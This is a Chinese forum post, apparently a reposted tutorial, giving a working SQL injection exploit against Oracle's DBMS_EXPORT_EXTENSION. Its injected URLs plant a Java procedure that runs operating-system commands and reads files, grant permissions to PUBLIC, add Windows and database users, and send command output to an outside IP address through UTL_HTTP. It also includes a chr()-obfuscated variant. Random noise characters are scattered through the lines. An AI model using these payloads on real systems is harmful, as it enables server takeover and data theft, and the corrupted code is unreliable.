以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
. a/ w3 z# x4 v
/ q1 J- B3 u* @ /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
( M. f2 v+ L8 |& l7 L! B& X的形式即可。(用" 'a'|| "是为了让语句返回true值) 0 S7 U/ f+ o q! O, H. c) a! D
语句有点长,可能要用post提交。 ) }+ F/ @5 M' C" n! `* S- R
以下是各个步骤:
; b8 `7 N# y6 a* R. t \1.创建包 9 |3 _' [* Y C' |5 p9 c
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:1 K1 u( z- b0 j
/xxx.jsp?id=1 and '1'<>'a'||(
J- }% l3 L! G0 k" [$ W8 Fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' j, E2 Y. N1 u [5 b2 X Acreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(1 }0 A0 D9 m$ Y6 } |8 D' Q3 u8 s
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
8 |$ g. m6 M1 U}'''';END;'';END;--','SYS',0,'1',0) from dual - j7 t# [# i, L# k
)
% n9 h {' q5 `0 V9 ]2 ^------------------------
; K0 {2 E5 m; T8 u如果url有长度限制,可以把readFile()函数块去掉,即:
d9 @; K' p, n, |/xxx.jsp?id=1 and '1'<>'a'||(
4 _' a7 Y' Z( Z& E1 S/ ]select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
0 n6 a% ~3 v2 Y9 J% v, Ucreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader() }: ]! V9 _8 `
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
, h3 i! y& }; }0 U0 {}'''';END;'';END;--','SYS',0,'1',0) from dual 9 @/ p% Y6 i" S4 _5 H& l
) / v9 Y {* a; R& B, ~- @
同时把后面步骤 提到的 对readFile()的处理语句去掉。 8 {" e& I& t+ v0 I2 v3 ?2 A
------------------------------
, o" N3 y6 E, T4 \- u2.赋Java权限 - J- ~$ g1 z0 H7 r+ D4 A
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
6 ^8 N. d: p0 W, q" f+ g8 A! k3.创建函数
1 ~) K7 X, y4 o+ zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ t) ^. C0 o5 g C! \% a7 K, P. icreate or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual" y% b/ h6 q* e( k6 v( D
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: p3 _ d, i S; c5 d+ O, Zcreate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual2 c$ S# |; T! g% R; _' r
4.赋public执行函数的权限 / c. Q! J% g3 i v/ o# r
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
1 l% i( R* K4 E6 T; T# Eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual! u, K! o6 t+ P/ m9 G
5.测试上面的几步是否成功
5 U- s; A/ Z8 S* w# V! fand '1'<>'11'||( 3 y5 {; u$ c* [7 p3 L2 S. p
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
( Z( L5 k% Z& b/ {2 G7 }. ]& J) ! L. u/ `" K0 L: k1 z
and '1'<>( # ]" k# y: r" O
select OBJECT_ID from all_objects where object_name ='LINXREADFILE' % L1 Y! T! V Z" a. j9 m
) ; f- y' M- @1 ~& o; G, a
6.执行命令: 8 l) K* J' b; e. J/ y
/xxx.jsp?id=1 and '1'<>(
+ r3 E; C, t* r' nselect sys.LinxRunCMD('cmd /c net user linx /add') from dual
' ?5 k1 F" G% p+ \/ t3 T5 A/ \- H. V; }
) n5 b2 I- k: [- q5 f( \5 v
/xxx.jsp?id=1 and '1'<>(
) T! H: ^# f4 i% p1 b7 gselect sys.LinxReadFile('c:/boot.ini') from dual
% O3 j* b1 E4 A. a9 i* l j2 P5 F6 E" B* s
)
; }# D; z" E6 X$ E
; h6 q- K$ h J0 M# w注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
2 h. G3 V" X# ? |5 _6 S如果要查看运行结果可以用 union :
" _! F! s% E6 h# q/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
/ ^ t; v5 T) }7 n( t$ A! F5 ?或者UTL_HTTP.request(: ( a0 D& @0 w* x
/xxx.jsp?id=1 and '1'<>( - F H+ i! @$ q! T( X0 T0 S2 @' c
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual$ [$ T; a0 t# p, N
)
7 J1 H3 o* A' Z. z: [/xxx.jsp?id=1 and '1'<>( , z/ Q. X( o9 H, [9 G
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual0 K: B: e- i" [- }
)
' Q1 p9 y0 U& L; p0 S5 p2 W/ C注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。2 x+ N. h8 X t- _
--------------------
# e0 E% H1 _( e; x& s6.内部变化 2 }3 I) z, D: y9 d$ E
通过以下命令可以查看all_objects表达改变:
6 i8 a$ E2 j0 W7 x0 i f5 T; E6 gselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'" b3 T0 _. p- f% P1 p/ ~& ^7 o
7.删除我们创建的函数
! h* `/ }( M1 Z. m- |select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ Z% x1 @9 C" ]2 X0 k) J- v
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
. a& z- x8 e$ z* A! [7 u====================================================
% _/ ] e3 T$ k" o: t全文结束。谨以此文赠与我的朋友。
! \7 U6 p. O' S0 b, P7 t/ v- Ilinx t3 ^' _$ J; y6 `; U6 M0 v& F
124829445 " b4 D0 F4 L9 B: W5 E- \3 ^
2008.1.12
& @7 ~5 L3 e, e* nlinyujian@bjfu.edu.cn
$ |6 I5 c! I, T1 E0 F====================================================================== ' p( ^' `5 k+ _
测试漏洞的另一方法: + u' d5 Q0 Y2 e, p$ O
创建oracle帐号: # W3 S" f+ c0 @1 q: f! K9 N2 ~
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''': N7 m5 Q) G, j; e' ^
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual0 n1 X+ f a7 c6 i8 r% t0 J, |
即: # X+ w7 S, H1 J8 V; ]# F
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),9 [6 X1 ~9 |" t
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual 3 I) f# O f) q8 V% L' b' a
确定漏洞存在: 5 P' K+ p6 i, j# V4 W6 f- {$ s' M) K
1<>( $ J9 B v. ~& O2 f$ k$ ~* w
select user_id from all_users where username='LINXSQL' + A9 J5 u' N( ]# R" t# W0 v+ W
)
0 {) L |' t4 B' S. ~给linxsql连接权限: + ^5 d& K6 j; J
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 I7 `5 O7 Z6 C# l8 G. q
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual " b, q9 W- Z& {+ M
删除帐号:
2 D2 g5 }' r3 @- r2 ]- mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 ^% R( Z! P8 E) b3 c
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 0 l: r, _' {. Y* O% n& w* U5 L
======================
. Y1 p" U/ A) _; A7 ? X7 U以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
; W' g' [! ?; `' ~1.jsp?id=1 and '1'<>(
8 u9 Y" v4 M$ D; jselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 v' T7 }" N* r7 h5 L* \) W
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual) ?0 B/ m5 G" D' n! h
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
8 H4 Y/ m T5 H, j A5 Z8 U ), \+ Q4 Q2 [+ Z8 `0 d3 U
; ?/ C2 i' E9 z& X
5 A8 M* j) l2 _. @; R" A9 Q
( L% P. S: d( z1 |
|
发表于 2012-12-18 12:21:48
收藏
支持
反对